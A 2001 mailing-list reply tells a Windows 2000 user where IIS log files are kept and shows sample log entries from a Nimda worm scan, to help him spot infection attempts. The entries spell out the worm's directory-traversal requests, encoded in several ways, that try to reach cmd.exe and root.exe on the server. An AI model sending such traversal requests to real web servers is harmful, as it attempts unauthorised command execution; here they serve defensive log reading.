[Date Prev][Date
Next][Thread Prev][Thread Next][Date
Index][Thread Index]
Re: IIS Worm
- To: ukha_d@xxxxxxx
- Subject: Re: IIS Worm
- From: "Mark Hetherington" <mark.egroups@xxxxxxx>
- Date: Wed, 19 Sep 2001 09:38:47 -0000
- Delivered-to: mailing list ukha_d@xxxxxxx
- Mailing-list: list ukha_d@xxxxxxx; contact
ukha_d-owner@xxxxxxx
- Reply-to: ukha_d@xxxxxxx
--- In ukha_d@y..., Pedro de Oliveira <oliveirp@B...> wrote:
> I am new to this IIS thing so any help would be appreciated. I am=20
on a LAN
> and am serving via IIS. I know I was not affected by Nimda but=20
would like
> to know if an attempt was made to infect me. I remember there is a=20
log for
> these types of things but I can't remember for the life of me where=20
it is.
> I am running Win2k Pro.
Pedro,=20
Look at the following location:
C:\WINNT\system32\LogFiles
This should have log files for most of your services. The W3SVC=20
directories relate to the web server logs.=20
An attack will look similar to this (note: IP addresses blanked for=20
privacy, first IP is the attacking machine, second is your web server=20
IP):
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /scripts/root.exe /c+dir 404 -
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /MSADC/root.exe /c+dir 403 -
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir=20
500 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir=20
404 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /msadc/..%5c../..%5c../..%
5c/..=C1=1C../..=C1=1C../..=C1=1C../winnt/system32/cmd.exe /c+dir 403 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /scripts/..=C1=1C../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:02 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
HTH.
Mark.
Home |
Main Index |
Thread Index
|